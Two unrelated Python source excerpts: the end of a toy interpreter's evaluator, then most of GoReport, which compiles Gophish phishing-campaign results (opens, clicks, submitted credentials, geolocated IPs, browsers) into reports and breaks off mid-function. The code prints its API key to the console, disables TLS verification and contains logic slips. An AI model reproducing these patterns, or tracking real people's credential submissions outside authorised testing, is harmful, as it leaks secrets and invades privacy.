if isinstance(result, object.ReturnValue):
return result.value
elif isinstance(result, object.Error):
return result
return result
def eval_ifexpression(ie: ast.IfExpression, env: environment.Environment) -> object.Object:
condition = evals(ie.condition, env)
if is_error(condition):
return condition
if is_truthy(condition):
return evals(ie.consequence, env)
elif ie.alternative is not None:
return evals(ie.alternative, env)
else:
return NULL
def is_truthy(obj: object.Object) -> bool:
if obj == NULL:
return False
elif obj == TRUE:
return True
elif obj == FALSE:
return False
else:
return True
def eval_infix_expression(operator: str, left: object.Object, right: object.Object) -> object.Object:
if left.type() == object.ObjectType.INTEGER_OBJ and right.type() == object.ObjectType.INTEGER_OBJ:
return eval_integer_infixexpression(operator, left, right)
elif left.type() == object.ObjectType.STRING_OBJ and right.type() == object.ObjectType.STRING_OBJ:
return eval_string_infixexpression(operator, left, right)
elif operator == '==':
return native_bool_2_boolean_object(left == right)
elif operator == '!=':
return native_bool_2_boolean_object(left != right)
elif left.type() != right.type():
return new_error('type mismatch: {} {} {}'.format(left.type().value,
operator,
right.type().value))
else:
return new_error('unknown operator: {} {} {}'.format(left.type().value,
operator,
right.type().value))
def eval_indexexpression(left:object.Object, index: object.Object) -> object.Object:
if left.type() == object.ObjectType.ARRAY_OBJ and index.type() == object.ObjectType.INTEGER_OBJ:
return eval_arrayindexexpression(left, index)
elif left.type() == object.ObjectType.HASH_OBJ:
return eval_hashindexexpression(left, index)
else:
return new_error('index operator not supported: {}'.format(left.type().value))
def eval_hashindexexpression(hash: object.Object, index: object.Object) -> object.Object:
if not isinstance(index, object.Hashable):
return new_error('unusable as hash key: {}'.format(index.type()))
pair = hash.pairs.get(index.hash_key(), 'error')
if pair == 'error':
return NULL
return pair.value
def eval_arrayindexexpression(array: object.Object, index: object.Object) -> object.Object:
ind = index.value
max = len(array.elements) -1
if ind <0 or ind > max:
return NULL
return array.elements[ind]
def eval_string_infixexpression(operator: str, left: object.Object, right: object.Object) -> object.Object:
if operator != '+':
return new_error('unknown operator: {} {} {}'.format(left.type().value, operator, right.type().value))
left_val = left.value
right_val = right.value
return object.String(value=left_val+right_val)
def eval_integer_infixexpression(operator: str, left: object.Object, right: object.Object) -> object.Object:
left_val = left.value
right_val = right.value
if operator == '+':
return object.Integer(value=left_val + right_val)
elif operator == '-':
return object.Integer(value=left_val - right_val)
elif operator == '*':
return object.Integer(value=left_val * right_val)
elif operator == '/':
return object.Integer(value=left_val / right_val)
elif operator == '<':
return native_bool_2_boolean_object(left_val < right_val)
elif operator == '>':
return native_bool_2_boolean_object(left_val > right_val)
elif operator == '==':
return native_bool_2_boolean_object(left_val == right_val)
elif operator == '!=':
return native_bool_2_boolean_object(left_val != right_val)
else:
return new_error('unknown operator: {} {} {}'.format(left.type().value,
operator,
right.type().value))
def eval_prefix_expression(operator: str, right: object.Object) -> object.Object:
if operator == '!':
return eval_bang_operator_expression(right)
elif operator == '-':
return eval_minus_prefixoperator_expression(right)
else:
return new_error('unknown operator: {}{}'.format(operator, right.type().value))
def eval_bang_operator_expression(right: object.Object) -> object.Object:
if right == TRUE:
return FALSE
elif right == FALSE:
return TRUE
elif right == NULL:
return TRUE
else:
return FALSE
def eval_minus_prefixoperator_expression(right: object.Object) -> object.Object:
if right.type() != object.ObjectType.INTEGER_OBJ:
return new_error('unknown operator: -{}'.format(right.type().value))
value = right.value
return object.Integer(value=-value)
def native_bool_2_boolean_object(input: bool) -> object.Boolean:
if input:
return TRUE
else:
return FALSE
def eval_statements(stmts: List[ast.Statement], env: environment.Environment) -> object.Object:
result = object.Object()
for statement in stmts:
result = evals(statement, env)
if isinstance(result, object.ReturnValue):
return result.value
return result
def new_error(err_msg: str) -> object.Error:
return object.Error(msg=err_msg)
def is_error(obj: object.Object) -> bool:
if obj is not None:
return obj.type() == object.ObjectType.ERROR_OBJ
return False
def eval_hashliteral(node: ast.HashLiteral, env: environment.Environment) -> object.Object:
pairs = {}
for k, v in node.pairs.items():
key = evals(k, env)
if is_error(key):
return key
if not isinstance(key, object.Hashable):
return new_error('unusable as hash key: {}'.format(key.type()))
value = evals(v, env)
if is_error(value):
return value
hashed = key.hash_key()
pairs[hashed] = object.HashPair(key=key, value=value)
return object.Hash(pairs=pairs)
|
the-stack_0_25884
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""This is the GoReport class. GoReport handles everything from connecting to the target Gophish
server to pulling campaign information and reporting the results.
"""
# Try to import gophish
try:
from gophish import Gophish
except:
print("[!] Could not import the Gophish library! Make sure it is installed.\n\
Run: `python3 -m pip intall gophish`\n\
Test it by running `python3` and then, in the \
Python prompt, typing `from gophish import Gophish`.")
exit()
# Imports for statistics, e.g. browser and operating systems
from user_agents import parse
from collections import Counter, OrderedDict
# Import for writing the Excel xlsx report
import xlsxwriter
# Imports for writing the Word docx report
import os.path
from docx import *
from docx.shared import *
from docx.enum.text import WD_ALIGN_PARAGRAPH
from docx.enum.style import WD_STYLE_TYPE
from docx.enum.table import WD_TABLE_ALIGNMENT
from docx.oxml.shared import OxmlElement, qn
# Basic imports
import sys
import configparser
import time
# Imports for web requests, e.g. Google Maps API for location data
# Disables the insecure HTTPS warning for the self-signed GoPpish certs
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
class Goreport(object):
"""This class uses the Gophish library to create a new Gophish API connection
and queries Gophish for information and results related to the specified
campaign ID(s).
"""
# Name of the config file -- default is gophish.config
goreport_config_file = "gophish.config"
verbose = False
# Variables for holding Gophish models
results = None
campaign = None
timeline = None
# Variables for holding campaign information
cam_id = None
cam_url = None
cam_name = None
cam_status = None
launch_date = None
created_date = None
cam_page_name = None
cam_smtp_host = None
completed_date = None
cam_redirect_url = None
cam_from_address = None
cam_subject_line = None
cam_template_name = None
cam_capturing_passwords = None
cam_capturing_credentials = None
# Variables and lists for tracking event numbers
total_sent = 0
total_opened = 0
total_targets = 0
total_clicked = 0
total_reported = 0
total_submitted = 0
total_unique_opened = 0
total_unique_clicked = 0
total_unique_reported = 0
total_unique_submitted = 0
targets_opened = []
targets_clicked = []
targets_reported = []
targets_submitted = []
# Lists and dicts for holding prepared report data
campaign_results_summary = []
# Lists for holding totals for statistics
browsers = []
locations = []
ip_addresses = []
ip_and_location = {}
operating_systems = []
# Output options
report_format = None
output_word_report = None
output_xlsx_report = None
xlsx_header_bg_color = "#0085CA"
xlsx_header_font_color = "#FFFFFF"
def __init__(self, report_format, config_file, google, verbose):
"""Initiate the connection to the Gophish server with the provided host,
port, and API key and prepare to use the external APIs.
"""
try:
# Check if an alternate config file was provided
if config_file:
self.goreport_config_file = config_file
# Open the config file to make sure it exists and is readable
config = configparser.ConfigParser()
config.read(self.goreport_config_file)
except Exception as e:
print("[!] Could not open {} -- make sure it exists and is readable.".format(self.goreport_config_file))
print("L.. Details: {}".format(e))
sys.exit()
try:
# Read in the values from the config file
GP_HOST = self.config_section_map(config, 'Gophish')['gp_host']
API_KEY = self.config_section_map(config, 'Gophish')['api_key']
except Exception as e:
print("[!] There was a problem reading values from the gophish.config file!")
print("L.. Details: {}".format(e))
sys.exit()
try:
# Read in the values from the config file
self.IPINFO_TOKEN = self.config_section_map(config, 'ipinfo.io')['ipinfo_token']
if not self.IPINFO_TOKEN:
self.IPINFO_TOKEN = None
except Exception as e:
self.IPINFO_TOKEN = None
print("[!] No ipinfo.io API token was found in the config. GoReport will not lookup IP addresses with ipinfo.io for additional location data.")
try:
# Read in the values from the config file
self.GEOLOCATE_TOKEN = self.config_section_map(config, 'Google')['geolocate_key']
if not self.GEOLOCATE_TOKEN:
self.GEOLOCATE_TOKEN = None
except Exception as e:
self.GEOLOCATE_TOKEN = None
if google:
print("[!] No Google Maps API token was found in the config so GoReport will ignore the `--google` flag.")
# Set command line options for the GoReport object
self.google = google
self.verbose = verbose
self.report_format = report_format
# Connect to the Gophish API
# NOTE: This step succeeds even with a bad API key, so the true test is fetching an ID
print("[+] Connecting to Gophish at {}".format(GP_HOST))
print("L.. The API Authorization endpoint is: {}/api/campaigns/?api_key={}".format(GP_HOST, API_KEY))
self.api = Gophish(API_KEY, host=GP_HOST, verify=False)
def run(self, id_list, combine_reports, set_complete_status):
"""Run everything to process the target campaign."""
# Output some feedback for user options
if combine_reports:
print("[+] Campaign results will be combined into a single report.")
if set_complete_status:
print('[+] Campaign statuses will be set to "Complete" after processing the results.')
try:
# Create the list of campaign IDs
temp_id = []
# Handle a mixed set of ranges and comma-separated IDs
if "-" and "," in id_list:
temp = id_list.split(",")
for x in temp:
if "-" in x:
lower = x.split("-")[0]
upper = x.split("-")[1]
for y in range(int(lower), int(upper) + 1):
temp_id.append(str(y))
else:
temp_id.append(x)
# Process IDs provided as one or more ranges
elif "-" in id_list:
lower = id_list.split("-")[0]
upper = id_list.split("-")[1]
for y in range(int(lower), int(upper) + 1):
temp_id.append(str(y))
# Process single or only comma-separated IDs
else:
temp_id = id_list.split(",")
id_list = temp_id
except Exception as e:
print("[!] Could not interpret your provided campaign IDs. \
Ensure the IDs are provided as comma-separated integers or interger ranges, e.g. 5,50-55,71.")
print("L.. Details: {}".format(e))
sys.exit()
# Begin processing the campaign IDs by removing any duplicates
try:
# Get length of user-provided list
initial_len = len(id_list)
# Remove duplicate IDs and sort IDs as integers
id_list = sorted(set(id_list), key=int)
# Get length of unique, sorted list
unique_len = len(id_list)
except Exception as e:
temp = []
for id in id_list:
try:
int(id)
except:
temp.append(id)
print("[!] There are {} invalid campaign ID(s), i.e. not an integer.".format(len(temp)))
print("L.. Offending IDs: {}".format(",".join(temp)))
sys.exit()
print("[+] A total of {} campaign IDs have been provided for processing.".format(initial_len))
# If the lengths are different, then GoReport removed one or more dupes
if initial_len != unique_len:
dupes = initial_len - unique_len
print("L.. GoReport found {} duplicate campaign IDs, so those have been trimmed.".format(dupes))
# Provide list of all IDs that will be processed
print("[+] GoReport will process the following campaign IDs: {}".format(",".join(id_list)))
# If --combine is used with just one ID it can break reporting, so we catch that here
if len(id_list) == 1 and combine_reports:
combine_reports = False
# Go through each campaign ID and get the results
campaign_counter = 1
for CAM_ID in id_list:
print("[+] Now fetching results for Campaign ID {} ({}/{}).".format(CAM_ID, campaign_counter, len(id_list)))
try:
# Request the details for the provided campaign ID
self.campaign = self.api.campaigns.get(campaign_id=CAM_ID)
except Exception as e:
print("[!] There was a problem fetching this campaign ID's details. \
Make sure your URL and API key are correct. Check HTTP vs HTTPS!".format(CAM_ID))
print("L.. Details: {}".format(e))
try:
try:
# Check to see if a success message was returned with a message
# Possible reasons: campaign ID doesn't exist or problem with host/API key
if self.campaign.success is False:
print("[!] Failed to get results for campaign ID {}".format(CAM_ID))
print("L.. Details: {}".format(self.campaign.message))
# We can't let an error with an ID stop reporting, so check if this was the last ID
if CAM_ID == id_list[-1] and combine_reports:
self.generate_report()
# If self.campaign.success does not exist then we were successful
except:
print("[+] Success!")
# Collect campaign details and process data
self.collect_all_campaign_info(combine_reports)
self.process_timeline_events(combine_reports)
self.process_results(combine_reports)
# If the --complete flag was set, now set campaign status to Complete
if set_complete_status:
print("[+] Setting campaign ID {}'s status to Complete.".format(CAM_ID))
try:
set_complete = self.api.campaigns.complete(CAM_ID)
try:
if set_complete.success is False:
print("[!] Failed to set campaign status for ID {}.".format(CAM_ID))
print("L.. Details: {}".format(set_complete.message))
# If set_complete.success does not exist then we were successful
except:
pass
except Exception as e:
print("[!] Failed to set campaign status for ID {}.".format(CAM_ID))
print("L.. Details: {}".format(e))
# Check if this is the last campaign ID in the list
# If this is the last ID and combined reports is on, generate the report
if CAM_ID == id_list[-1] and combine_reports:
self.generate_report()
# Otherwise, if we are not combining reports, generate the reports
elif combine_reports is False:
self.generate_report()
campaign_counter += 1
except Exception as e:
print("[!] There was a problem processing campaign ID {}!".format(CAM_ID))
print("L.. Details: {}".format(e))
sys.exit()
def lookup_ip(self, ip):
"""Lookup the provided IP address with ipinfo.io for location data.
Example Result:
{'ip': '52.44.93.197',
'hostname': 'ec2-52-44-93-197.compute-1.amazonaws.com',
'city': 'Beaumont',
'region': 'Texas',
'country': 'US',
'loc': '30.0866,-94.1274',
'postal': '77702',
'phone': '409',
'org': 'AS14618 Amazon.com, Inc.'}
"""
ipinfo_url = "https://ipinfo.io/{}?token={}".format(ip, self.IPINFO_TOKEN)
try:
r = requests.get(ipinfo_url)
return r.json()
except Exception as e:
print("[!] Failed to lookup {} with ipinfo.io.".format(ip))
return None
def get_google_location_data(self, lat, lon):
"""Use Google's Maps API to collect location info for the provided latitude and longitude.
Google returns a bunch of JSON with a variety of location data. This function returns
Google's pre-formatted `formatted_address` key for a human-readable address.
"""
google_maps_url = "https://maps.googleapis.com/maps/api/geocode/json?latlng={},{}&sensor=false&key={}".format(lat, lon, self.GEOLOCATE_TOKEN)
r = requests.get(google_maps_url)
maps_json = r.json()
if r.ok:
try:
if "error_message" in maps_json:
print("[!] Google Maps returned an error so using Gophish coordinates. Error: {}".format(maps_json['error_message']))
return "{}, {}".format(lat, lon)
first_result = maps_json['results'][0]
if "formatted_address" in first_result:
return first_result["formatted_address"]
# In case that key is ever unavailable try to assemble an address
else:
components = first_result['address_components']
country = town = None
for c in components:
if "country" in c['types']:
country = c['long_name']
if "locality" in c['types']:
town = c['long_name']
if "administrative_area_level_1" in c['types']:
state = c['long_name']
return "{}, {}, {}".format(town, state, country)
except Exception as e:
print("[!] Failed to parse Google Maps API results so using Gophish coordinates.")
print("L.. Error: {}".format(e))
return "{}, {}".format(lat, lon)
else:
print("[!] Failed to contact the Google Maps API so using Gophish coordinates. Status code: {}".format(r.status_code))
return "{}, {}".format(lat, lon)
def geolocate(self, target, ipaddr, google=False):
"""Attempt to get location data for the provided target and event. Will use ipinfo.io if an
API key is configured. Otherwise the Gophish latitude and longitude coordinates will be
returned. If `google` is set to True this function will try to match the coordinates to a
location using the Google Maps API.
Returns a string: City, Region, Country
"""
if ipaddr in self.ip_and_location:
return self.ip_and_location[ipaddr]
else:
if self.IPINFO_TOKEN:
# location_json = self.lookup_ip(event.details['browser']['address'])
location_json = self.lookup_ip(ipaddr)
if location_json:
city = region = country = "Unknown"
if "city" in location_json:
if location_json['city']:
city = location_json['city']
if "region" in location_json:
if location_json['region']:
region = location_json['region']
if "country" in location_json:
if location_json['country']:
country = location_json['country']
location = "{}, {}, {}".format(city, region, country)
else:
location = "{}, {}".format(target.latitude, target.longitude)
elif google:
if self.GEOLOCATE_TOKEN:
location = self.get_google_location_data(target.latitude, target.longitude)
else:
location = "{}, {}".format(target.latitude, target.longitude)
else:
location = "{}, {}".format(target.latitude, target.longitude)
self.locations.append(location)
self.ip_and_location[ipaddr] = location
return location
def compare_ip_addresses(self, target_ip, browser_ip, verbose):
"""Compare the IP addresses of the target to that of an event. The goal: Looking for a
mismatch that might identify some sort of interesting event. This might indicate an
email was forwarded, a VPN was switched on/off, or maybe the target is at home.
"""
if target_ip == browser_ip:
return target_ip
else:
# We have an IP mismatch -- hard to tell why this might be.
if verbose:
print("[*] Event: This target's ({}) URL was clicked from a browser at {}.".format(target_ip, browser_ip))
# This is an IP address not included in the results model, so we add it to our list here
self.ip_addresses.append(browser_ip)
return browser_ip
def get_basic_campaign_info(self):
""""Helper function to collect a campaign's basic details. This includes campaign name,
status, template, and other details that are not the campaign's results.
This keeps these calls in one place for tidiness and easier management.
"""
self.cam_name = self.campaign.name
self.cam_status = self.campaign.status
self.created_date = self.campaign.created_date
self.launch_date = self.campaign.launch_date
self.completed_date = self.campaign.completed_date
self.cam_url = self.campaign.url
# Collect SMTP information
self.smtp = self.campaign.smtp
self.cam_from_address = self.smtp.from_address
self.cam_smtp_host = self.smtp.host
# Collect the template information
self.template = self.campaign.template
self.cam_subject_line = self.template.subject
self.cam_template_name = self.template.name
self.cam_template_attachments = self.template.attachments
if self.cam_template_attachments == []:
self.cam_template_attachments = "None Used"
# Collect the landing page information
self.page = self.campaign.page
self.cam_page_name = self.page.name
self.cam_redirect_url = self.page.redirect_url
if self.cam_redirect_url == "":
self.cam_redirect_url = "Not Used"
self.cam_capturing_passwords = self.page.capture_passwords
self.cam_capturing_credentials = self.page.capture_credentials
def collect_all_campaign_info(self, combine_reports):
"""Collect the campaign's details and set values for each of the variables."""
# Collect the basic campaign details
try:
# Begin by checking if the ID is valid
self.cam_id = self.campaign.id
if combine_reports and self.cam_name is None:
print("[+] Reports will be combined -- setting name, dates, and URL based on campaign ID {}.".format(self.cam_id))
self.get_basic_campaign_info()
elif combine_reports is False:
self.get_basic_campaign_info()
# Collect the results and timeline lists
if self.results is None:
self.results = self.campaign.results
self.timeline = self.campaign.timeline
elif combine_reports:
self.results += self.campaign.results
self.timeline += self.campaign.timeline
else:
self.results = self.campaign.results
self.timeline = self.campaign.timeline
except:
print("[!] Looks like campaign ID {} does not exist! Skipping it...".format(self.cam_id))
def process_results(self, combine_reports):
"""Process the results model to collect basic data, like total targets and event details.
This should be run after the process_timeline_events() function which creates the
targets_* lists.
The results model can provide:
first_name, last_name, email, position, and IP address
"""
# Total length of results gives us the total number of targets
if combine_reports and self.total_targets is None:
self.total_targets = len(self.campaign.results)
elif combine_reports:
self.total_targets += len(self.campaign.results)
else:
# Reports will not be combined, so reset tracking between reports
self.total_targets = len(self.campaign.results)
self.ip_addresses = []
self.campaign_results_summary = []
# Go through all results and extract data for statistics
for target in self.campaign.results:
temp_dict = {}
# Log the IP address for additional statistics later
if not target.ip == "":
self.ip_addresses.append(target.ip)
self.geolocate(target, target.ip, self.google)
# Add all of the recipient's details and results to the temp dictionary
temp_dict["email"] = target.email
temp_dict["fname"] = target.first_name
temp_dict["lname"] = target.last_name
temp_dict["ip_address"] = target.ip
# Check if this target was recorded as viewing the email (tracking image)
if target.email in self.targets_opened:
temp_dict["opened"] = True
self.total_unique_opened += 1
else:
temp_dict["opened"] = False
# Check if this target clicked the link
if target.email in self.targets_clicked:
temp_dict["clicked"] = True
self.total_unique_clicked += 1
else:
temp_dict["clicked"] = False
# Check if this target submitted data
if target.email in self.targets_submitted:
temp_dict["submitted"] = True
self.total_unique_submitted += 1
else:
temp_dict["submitted"] = False
# Check if this target reported the email
if target.email in self.targets_reported:
temp_dict["reported"] = True
self.total_unique_reported += 1
else:
temp_dict["reported"] = False
# Append the temp dictionary to the event summary list
self.campaign_results_summary.append(temp_dict)
def process_timeline_events(self, combine_reports):
"""Process the timeline model to collect basic data, like total clicks, and get detailed
event data for recipients.
The timeline model contains all events that occurred during the campaign.
"""
# Create counters for enumeration
sent_counter = 0
click_counter = 0
opened_counter = 0
reported_counter = 0
submitted_counter = 0
# Run through all events and count each of the four basic events
for event in self.campaign.timeline:
if event.message == "Email Sent":
sent_counter += 1
elif event.message == "Email Opened":
opened_counter += 1
self.targets_opened.append(event.email)
elif event.message == "Clicked Link":
click_counter += 1
self.targets_clicked.append(event.email)
elif event.message == "Submitted Data":
submitted_counter += 1
self.targets_submitted.append(event.email)
elif event.message == "Email Reported":
reported_counter += 1
self.targets_reported.append(event.email)
# Assign the counter values to our tracking lists
if combine_reports:
# Append, +=, totals if combining reports
self.total_sent += sent_counter
self.total_opened += opened_counter
self.total_clicked += click_counter
self.total_reported += reported_counter
self.total_submitted += submitted_counter
else:
# Set tracking variables to current counter values for non-combined reports
self.total_sent = sent_counter
self.total_opened = opened_counter
self.total_clicked = click_counter
self.total_reported = reported_counter
self.total_submitted = submitted_counter
def generate_report(self):
"""Determines which type of report generate and the calls the appropriate reporting
functions.
"""
if self.report_format == "excel":
print("[+] Building the report -- you selected a Excel/xlsx report.")
self.output_xlsx_report = self._build_output_xlsx_file_name()
self.write_xlsx_report()
elif self.report_format == "word":
print("[+] Building the report -- you selected a Word/docx report.")
print("[+] Looking for the template.docx to be used for the Word report.")
if os.path.isfile("template.docx"):
print("[+] Template was found -- proceeding with report generation...")
print("L.. Word reports can take a while if you had a lot of recipients.")
self.output_word_report = self._build_output_word_file_name()
self.write_word_report()
else:
print("[!] Could not find the template document! Make sure 'template.docx' is in the GoReport directory.")
sys.exit()
elif self.report_format == "quick":
print("[+] Quick report stats:")
self.get_quick_stats()
def get_quick_stats(self):
"""Present quick stats for the campaign. Just basic numbers and some details."""
print()
print(self.cam_name)
print("Status:\t\t{}".format(self.cam_status))
print("Created:\t{} on {}".format(self.created_date.split("T")[1].split(".")[0],
self.created_date.split("T")[0]))
print("Started:\t{} on {}".format(self.launch_date.split("T")[1].split(".")[0],
self.launch_date.split("T")[0]))
if self.cam_status == "Completed":
print("Completed:\t{} on {}".format(self.completed_date.split("T")[1].split(".")[0],
self.completed_date.split("T")[0]))
print()
print("Total Targets:\t{}".format(self.total_targets))
print("Emails Sent:\t{}".format(self.total_sent))
print("IPs Seen:\t{}".format(len(self.ip_addresses)))
print()
print("Total Opened Events:\t\t{}".format(self.total_opened))
print("Total Click Events:\t\t{}".format(self.total_clicked))
print("Total Submitted Data Events:\t{}".format(self.total_submitted))
print()
print("Individuals Who Opened:\t\t\t{}".format(self.total_unique_opened))
print("Individuals Who Clicked:\t\t{}".format(self.total_unique_clicked))
print("Individuals Who Entered Data:\t\t{}".format(self.total_unique_submitted))
print("Individuals Who Reported the Email:\t{}".format(self.total_unique_reported))
def _build_output_xlsx_file_name(self):
"""Create the xlsx report name."""
xlsx_report = "Gophish Results for {}.xlsx".format(self.cam_name)
return xlsx_report
def _build_output_word_file_name(self):
"""Create the docx report name."""
word_report = "Gophish Results for {}.docx".format(self.cam_name)
return word_report
def _set_word_column_width(self, column, width):
"""Custom function for quickly and easily setting the width of a table's column in the Word
docx output.
This option is missing from the basic Python-docx library.
"""
for cell in column.cells:
cell.width = width
def write_xlsx_report(self):
"""Assemble and output the xlsx file report.
Throughout this function, results are assembled by adding commas and then adding to a
results string, i.e. 'result_A' and then 'result_A' += ',result_B'. This is so the
result can be written to the csv file and have the different pieces end up in the correct
columns.
"""
goreport_xlsx = xlsxwriter.Workbook(self.output_xlsx_report)
# Bold format
bold_format = goreport_xlsx.add_format({'bold': True})
bold_format.set_text_wrap()
bold_format.set_align('vcenter')
# Centered format
center_format = goreport_xlsx.add_format()
center_format.set_text_wrap()
center_format.set_align('vcenter')
center_format.set_align('center')
# Header format
header_format = goreport_xlsx.add_format({'bold': True})
header_format.set_text_wrap()
header_format.set_align('vcenter')
header_format.set_bg_color(self.xlsx_header_bg_color)
header_format.set_font_color(self.xlsx_header_font_color)
# Number cells
num_format = goreport_xlsx.add_format()
num_format.set_align('center')
# Boolean cells - True
true_format = goreport_xlsx.add_format({'bold': True})
true_format.set_text_wrap()
true_format.set_align('vcenter')
true_format.set_font_color("#9C0006")
true_format.set_bg_color("#FFC7CE")
# Boolean cells - True
false_format = goreport_xlsx.add_format()
false_format.set_text_wrap()
false_format.set_align('vcenter')
false_format.set_font_color("#006100")
false_format.set_bg_color("#C6EFCE")
# Remaining cells
wrap_format = goreport_xlsx.add_format()
wrap_format.set_text_wrap()
wrap_format.set_align('vcenter')
worksheet = goreport_xlsx.add_worksheet("Overview")
col = 0
row = 0
worksheet.set_column(0, 10, 62)
worksheet.write(row, col, "Campaign Results For:", bold_format)
worksheet.write(row, col+1, "{}".format(self.cam_name), wrap_format)
row += 1
worksheet.write(row, col, "Status", bold_format)
worksheet.write(row, col+1, "{}".format(self.cam_status), wrap_format)
row += 1
worksheet.write(row, col, "Created", bold_format)
worksheet.write(row, col+1, "{}".format(self.created_date), wrap_format)
row += 1
worksheet.write(row, col, "Started", bold_format)
worksheet.write(row, col+1, "{}".format(self.launch_date), wrap_format)
row += 1
if self.cam_status == "Completed":
worksheet.write(row, col, "Completed", bold_format)
worksheet.write(row, col+1, "{}".format(self.completed_date), wrap_format)
row += 1
worksheet.write(row, col, "")
row += 1
worksheet.write(row, col, "Campaign Details", bold_format)
row += 1
worksheet.write(row, col, "From", bold_format)
worksheet.write(row, col+1, "{}".format(self.cam_from_address), wrap_format)
row += 1
worksheet.write(row, col, "Subject", bold_format)
worksheet.write(row, col+1, "{}".format(self.cam_subject_line), wrap_format)
row += 1
worksheet.write(row, col, "Phish URL", bold_format)
worksheet.write(row, col+1, "{}".format(self.cam_url), wrap_format)
row += 1
worksheet.write(row, col, "Redirect URL", bold_format)
worksheet.write(row, col+1, "{}".format(self.cam_redirect_url), wrap_format)
row += 1
worksheet.write(row, col, "Attachment(s)", bold_format)
worksheet.write(row, col+1, "{}".format(self.cam_template_attachments), wrap_format)
row += 1
worksheet.write(row, col, "Captured Passwords", bold_format)
worksheet.write(row, col+1, "{}".format(self.cam_capturing_credentials), wrap_format)
row += 1
worksheet.write(row, col, "Stored Passwords", bold_format)
worksheet.write(row, col+1, "{}".format(self.cam_capturing_passwords), wrap_format)
row += 1
worksheet.write(row, col, "")
row += 1
# Write a high level summary for stats
worksheet.write(row, col, "High Level Results", bold_format)
row += 1
worksheet.write(row, col, "Total Targets", bold_format)
worksheet.write(row, col+1, self.total_targets, num_format)
row += 1
worksheet.write(row, col, "The following totals indicate how many events of each type Gophish recorded:", wrap_format)
row += 1
worksheet.write(row, col, "Total Opened Events", bold_format)
worksheet.write_number(row, col+1, self.total_opened, num_format)
row += 1
worksheet.write(row, col, "Total Clicked Events", bold_format)
worksheet.write_number(row, col+1, self.total_clicked, num_format)
row += 1
worksheet.write(row, col, "Total Submitted Data Events", bold_format)
worksheet.write(row, col+1, "", wrap_format)
row += 1
worksheet.write(row, col, "Total Report Events", bold_format)
worksheet.write_number(row, col+1, self.total_reported, num_format)
row += 1
worksheet.write(row, col, "The following totals indicate how many targets participated in each event type:", wrap_format)
row += 1
worksheet.write(row, col, "Individuals Who Opened", bold_format)
worksheet.write_number(row, col+1, self.total_unique_opened, num_format)
row += 1
worksheet.write(row, col, "Individuals Who Clicked", bold_format)
worksheet.write_number(row, col+1, self.total_unique_clicked, num_format)
row += 1
worksheet.write(row, col, "Individuals Who Submitted Data", bold_format)
worksheet.write_number(row, col+1, self.total_unique_submitted, num_format)
row += 1
worksheet.write(row, col, "Individuals Who Reported", bold_format)
worksheet.write_number(row, col+1, self.total_unique_reported, num_format)
row += 1
worksheet.write(row, col, "")
row += 1
worksheet = goreport_xlsx.add_worksheet("Summary")
row = 0
col = 0
worksheet.set_column(0, 10, 20)
worksheet.write(row, col, "Summary of Events", bold_format)
row += 1
header_col = 0
headers = ["Email Address", "Open", "Click", "Creds", "Report", "OS", "Browser"]
for header in headers:
worksheet.write(row, header_col, header, header_format)
header_col += 1
row += 1
# Sort campaign summary by each dict's email entry and then create results table
target_counter = 0
ordered_results = sorted(self.campaign_results_summary, key=lambda k: k['email'])
for target in ordered_results:
worksheet.write(row, col, target['email'], wrap_format)
if target['opened']:
worksheet.write_boolean(row, col+1, target['opened'], true_format)
else:
worksheet.write_boolean(row, col+1, target['opened'], false_format)
if target['clicked']:
worksheet.write_boolean(row, col+2, target['clicked'], true_format)
else:
worksheet.write_boolean(row, col+2, target['clicked'], false_format)
if target['submitted']:
worksheet.write_boolean(row, col+3, target['submitted'], true_format)
else:
worksheet.write_boolean(row, col+3, target['submitted'], false_format)
if target['reported']:
worksheet.write_boolean(row, col+4, target['reported'], true_format)
else:
worksheet.write_boolean(row, col+4, target['reported'], false_format)
if target['email'] in self.targets_clicked:
for event in self.timeline:
if event.message == "Clicked Link" and event.email == target['email']:
user_agent = parse(event.details['browser']['user-agent'])
browser_details = user_agent.browser.family + " " + \
user_agent.browser.version_string
os_details = user_agent.os.family + " " + user_agent.os.version_string
worksheet.write(row, col+5, browser_details, wrap_format)
worksheet.write(row, col+6, os_details, wrap_format)
else:
worksheet.write(row, col+5, "N/A", wrap_format)
worksheet.write(row, col+6, "N/A", wrap_format)
row += 1
target_counter += 1
print("[+] Created row for {} of {}.".format(target_counter, self.total_targets))
print("[+] Finished writing events summary...")
print("[+] Detailed results analysis is next and will take some time if you had a lot of targets...")
# End of the event summary and beginning of the detailed results
worksheet = goreport_xlsx.add_worksheet("Event Details")
row = 0
col = 0
worksheet.set_column(0, 10, 40)
worksheet.write(row, col, "Detailed Analysis", bold_format)
row += 1
target_counter = 0
for target in self.results:
# Only create a Detailed Analysis section for targets with clicks
if target.email in self.targets_clicked:
worksheet.write(row, col, "{} {}".format(target.first_name, target.last_name), bold_format)
row += 1
worksheet.write(row, col, target.email, wrap_format)
row += 1
# Go through all events to find events for this target
for event in self.timeline:
if event.message == "Email Sent" and event.email == target.email:
# Parse the timestamp into separate date and time variables
temp = event.time.split('T')
sent_date = temp[0]
sent_time = temp[1].split('.')[0]
# Record the email sent date and time in the report
worksheet.write(row, col, "Sent on {} at {}".format(sent_date.replace(",", ""), sent_time), wrap_format)
row += 1
if event.message == "Email Opened" and event.email == target.email:
# Record the email preview date and time in the report
temp = event.time.split('T')
worksheet.write(row, col, "Email Preview at {} {}".format(temp[0], temp[1].split('.')[0]), wrap_format)
row += 1
if event.message == "Clicked Link" and event.email == target.email:
worksheet.write(row, col, "Email Link Clicked", bold_format)
row += 1
header_col = 0
headers = ["Time", "IP", "Location", "Browser", "Operating System"]
for header in headers:
worksheet.write(row, header_col, header, header_format)
header_col += 1
row += 1
temp = event.time.split('T')
worksheet.write(row, col, "{} {}".format(temp[0], temp[1].split('.')[0]), wrap_format)
# Check if browser IP matches the target's IP and record result
ip_comparison = self.compare_ip_addresses(target.ip,
event.details['browser']['address'],
self.verbose)
worksheet.write(row, col+1, "{}".format(ip_comparison), wrap_format)
# Parse the location data
loc = self.geolocate(target, event.details['browser']['address'], self.google)
worksheet.write(row, col+2, loc, wrap_format)
# Parse the user-agent string and add browser and OS details
user_agent = parse(event.details['browser']['user-agent'])
browser_details = user_agent.browser.family + " " + \
user_agent.browser.version_string
worksheet.write(row, col+3, browser_details, wrap_format)
self.browsers.append(browser_details)
os_details = user_agent.os.family + " " + user_agent.os.version_string
